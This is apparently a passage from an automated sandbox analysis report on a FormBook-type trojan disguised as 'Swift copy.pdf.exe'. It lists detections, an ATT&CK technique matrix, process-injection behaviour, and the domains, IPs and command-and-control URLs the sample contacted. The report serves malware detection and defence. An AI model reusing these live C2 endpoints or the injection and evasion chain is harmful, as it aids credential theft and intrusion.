          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading21OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information14Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385261 Sample: Swift copy.pdf.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 www.marktheoilguy.com 2->36 38 marktheoilguy.com 2->38 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 10 other signatures 2->54 11 Swift copy.pdf.exe 3 2->11         started        signatures3 process4 file5 34 C:\Users\user\...\Swift copy.pdf.exe.log, ASCII 11->34 dropped 66 Injects a PE file into a foreign processes 11->66 15 Swift copy.pdf.exe 11->15         started        18 Swift copy.pdf.exe 11->18         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 20 explorer.exe 15->20 injected process9 dnsIp10 40 www.stepmed.life 5.101.123.53, 80 PAGM-ASEE Estonia 20->40 42 agenciaorange.net 51.222.80.112, 49753, 80 OVHFR France 20->42 44 10 other IPs or domains 20->44 56 System process connects to network (likely due to code injection or exploit) 20->56 58 Performs DNS queries to domains with low reputation 20->58 24 cscript.exe 12 20->24         started        28 autoconv.exe 20->28         started        signatures11 process12 dnsIp13 46 www.stepmed.life 24->46 60 Modifies the context of a thread in another process (thread injection) 24->60 62 Maps a DLL or memory area into another process 24->62 64 Tries to detect virtualization through RDTSC time measurements 24->64 30 cmd.exe 1 24->30         started        signatures14 process15 process16 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Swift copy.pdf.exe31%VirustotalBrowse
          Swift copy.pdf.exe21%ReversingLabsWin32.Trojan.AgentTesla
          Swift copy.pdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.Swift copy.pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          wapgoals.com0%VirustotalBrowse
          marktheoilguy.com0%VirustotalBrowse
          www.rileysboutique.com0%VirustotalBrowse
          technomark.xyz0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.indiafoodtraveling.com/px.js?ch=20%Avira URL Cloudsafe
          http://www.tiro.comF0%Avira URL Cloudsafe
          http://www.indiafoodtraveling.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
          http://www.criticalredux.com/ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.como.n0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/n0%Avira URL Cloudsafe
          www.wapgoals.com/ifne/0%Avira URL Cloudsafe
          http://www.carterandcone.comdjq0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/z0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.wapgoals.com/ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://www.carterandcone.comL0%Avira URL Cloudsafe
          http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Y0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://www.tiro.comS~0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Aq0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://www.rileysboutique.com/ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://www.carterandcone.comu0%Avira URL Cloudsafe
          http://www.fontbureau.commH0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.carterandcone.coms0%URL Reputationsafe
          http://www.zhongyicts.com.cns0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://www.carterandcone.coma-d0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://en.w0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.htmlv0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnd&~u0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cno.n0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          hosted.fireside.fm
          		45.33.51.100
          		truefalse
            		high
            wapgoals.com
            		34.102.136.180
            		truefalseunknown
            marktheoilguy.com
            		184.168.131.241
            		truetrueunknown
            www.rileysboutique.com
            		74.208.236.87
            		truetrueunknown
            technomark.xyz
            		174.136.25.55
            		truetrueunknown
            www.stepmed.life
            		5.101.123.53
            		truetrue
              		unknown
              agenciaorange.net
              		51.222.80.112
              		truetrue
                		unknown
                www.indiafoodtraveling.com
                		204.11.56.48
                		truetrue
                  		unknown
                  www.agenciaorange.net
                  		unknown
                  		unknowntrue
                    		unknown
                    www.lehoachi.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.marktheoilguy.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.technomark.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.wapgoals.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.criticalredux.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.criticalredux.com/ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.wapgoals.com/ifne/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.wapgoals.com/ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6tfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.rileysboutique.com/ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.indiafoodtraveling.com/ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersGSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.html8Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpfalse
                                      		high
                                      http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.tiro.comexplorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.indiafoodtraveling.com/px.js?ch=2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiro.comFSwift copy.pdf.exe, 00000000.00000003.328467490.000000000574B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.indiafoodtraveling.com/px.js?ch=1cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.goodfont.co.krSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comSwift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssSwift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                            		high
                                            http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefixcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.typography.netDSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/cTheSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.como.nSwift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/nSwift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comdjqSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/zSwift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              		high
